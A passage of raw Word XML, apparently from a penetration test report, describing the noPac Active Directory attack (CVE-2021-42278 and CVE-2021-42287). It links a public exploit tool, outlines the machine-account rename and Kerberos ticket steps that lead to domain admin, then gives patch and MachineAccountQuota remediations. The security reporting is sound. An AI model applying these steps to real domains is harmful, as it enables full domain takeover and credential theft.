          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with name checking. This </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51ED06DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerability allows an attacker to gain administrative control over the Domain Controller.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6124CF1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A9B605D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit takes advantage of two </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="19B6F073">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>publicly</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A9B605D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> disclosed vulnerabilities, CVE-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79F97735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2021-42278</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="604B4E3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and CVE-2021-42287.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3041BCCA" w14:textId="294595F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71CCCF81" w:rsidP="0D325B6E" w:rsidRDefault="71CCCF81" w14:paraId="6FF62038" w14:textId="09A6121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1CCCF8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A9C1610" w:rsidP="0D325B6E" w:rsidRDefault="2A9C1610" w14:paraId="3699F6B9" w14:textId="0D504E86">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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9C1610">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful exploitation leads to a full domain compromise, with the attacker gaining complete control over the entire </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5505A001">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="27B440E7">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5505A001">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>orest</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A9C1610">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65B42ADA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is enables </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0314A806">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65B42ADA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacker to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A9C1610">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> steal all credentials, deploy malware, exfiltrate or destroy sensitive data, and take over all domain-joined systems and services running on those systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13829949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="71CCCF81" w:rsidP="0D325B6E" w:rsidRDefault="71CCCF81" w14:paraId="43F97749" w14:textId="156B9F5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1CCCF8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7B2A0D5" w:rsidP="0D325B6E" w:rsidRDefault="17B2A0D5" w14:paraId="62013D64" w14:textId="6B553A9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7B2A0D5">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the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="17B2A0D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>noPac</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="17B2A0D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61A52FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit found on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="061A52FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="061A52F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hyperlink r:id="R9ce564052f034ed6">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="061A52FE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/Ridter/noPac</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="061A52FE" w:rsidP="0D325B6E" w:rsidRDefault="061A52FE" w14:paraId="18FB0939" w14:textId="3AC1A11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61A52FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Input valid credentials and get a domain administrator shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BC547B5" w:rsidP="0D325B6E" w:rsidRDefault="1BC547B5" w14:paraId="52C6E2DF" w14:textId="0F2F484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R</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BC547B5" w:rsidP="0D325B6E" w:rsidRDefault="1BC547B5" w14:paraId="6EB4D6B0" w14:textId="68CF8AD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Step 1: Create a new machine account on the domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BC547B5" w:rsidP="0D325B6E" w:rsidRDefault="1BC547B5" w14:paraId="684F3FDC" w14:textId="346C6F5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 xml:space="preserve">Step 2: Rename the machine account’s </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="221EA0C7">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AMAccountName</w:t>
      </w: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 xml:space="preserve"> to match a domain controller's name, without the ending ‘$’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BC547B5" w:rsidP="0D325B6E" w:rsidRDefault="1BC547B5" w14:paraId="2CB8E5AF" w14:textId="3EAF18F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Step 3: Request a Kerberos Ticket Granting Ticket (TGT) for the account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1BC547B5" w:rsidP="0D325B6E" w:rsidRDefault="1BC547B5" w14:paraId="355B09A6" w14:textId="55C69E0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C547B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 4: Use this ticket to request a service ticket, which will have Domain Admin privileges, allowing for a takeover of the Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="144D69BA" w14:textId="7932A44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71CCCF81" w:rsidP="0D325B6E" w:rsidRDefault="71CCCF81" w14:paraId="6CBAC53E" w14:textId="548E73B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1CCCF81">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FD2DFBE" w:rsidP="0D325B6E" w:rsidRDefault="4FD2DFBE" w14:paraId="22458D87" w14:textId="5D2CDBCC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4FD2DFB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FD2DFB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4FD2DFBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1113A2AF" w:rsidP="0D325B6E" w:rsidRDefault="1113A2AF" w14:paraId="19F491AE" w14:textId="08B21EA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="16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113A2AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Install security updates released by Microsoft </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="06E078D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1113A2AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> November 2021 or later for all Domain Controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1113A2AF" w:rsidP="0D325B6E" w:rsidRDefault="1113A2AF" w14:paraId="607C585F" w14:textId="65646E70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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113A2AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Change the Active Directory attribute MS-DS-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1113A2AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MachineAccountQuota</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1113A2AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to zero to prevent non-privileged users from adding new machine accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7632C921" w:rsidP="0D325B6E" w:rsidRDefault="7632C921" w14:paraId="3E164BE9" w14:textId="6B5E3889">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>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632C921">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attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0746ACFE" w14:textId="6D6E8E70">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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5EBEE9C1" w:rsidP="0D325B6E" w:rsidRDefault="5EBEE9C1" w14:paraId="064E7D30" w14:textId="0A244D9B">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5EBEE9C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D047A47" w:rsidP="0D325B6E" w:rsidRDefault="1D047A47" w14:paraId="4809A5F4" w14:textId="1AB2B5C0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rc89a087316954a98">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1D047A47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Secureworks - noPac Vulnerability Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1D047A47" w:rsidP="0D325B6E" w:rsidRDefault="1D047A47" w14:paraId="3DFB4248" w14:textId="357F1CF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afb2a5b56faa4cc9">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1D047A47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - CVE-2021-42278</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1D047A47" w:rsidP="0D325B6E" w:rsidRDefault="1D047A47" w14:paraId="373EA7A6" w14:textId="7D2135E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22cd48a2a71c4671">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1D047A47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - CVE-2021-42287</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="79CA531C" w14:textId="28C9A14E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1265CC68" w14:textId="38A7C0B0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="16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p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="70FD4EEF" w14:textId="274D67E9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="041A3DFF" w14:textId="41C30EE5">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1906D22F" w:rsidP="0D325B6E" w:rsidRDefault="1906D22F" w14:paraId="56E6685A" w14:textId="0E538901">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc83406699" w:id="425918659"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1906D22F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1906D22F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1383323608" w:id="1543395729"/>
      <w:bookmarkStart w:name="_Toc258206342" w:id="1004149653"/>
      <w:bookmarkStart w:name="_Toc1524804348" w:id="1309855717"/>
      <w:bookmarkStart w:name="_Toc434917233" w:id="1281265040"/>
      <w:bookmarkStart w:name="_Toc300679629" w:id="1137840847"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="055086DC">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1590870979" w:id="130684328"/>
      <w:bookmarkStart w:name="_Toc1220299891" w:id="834673001"/>
      <w:bookmarkStart w:name="_Toc1269133454" w:id="12410264"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12712B1F">
        <w:rPr>
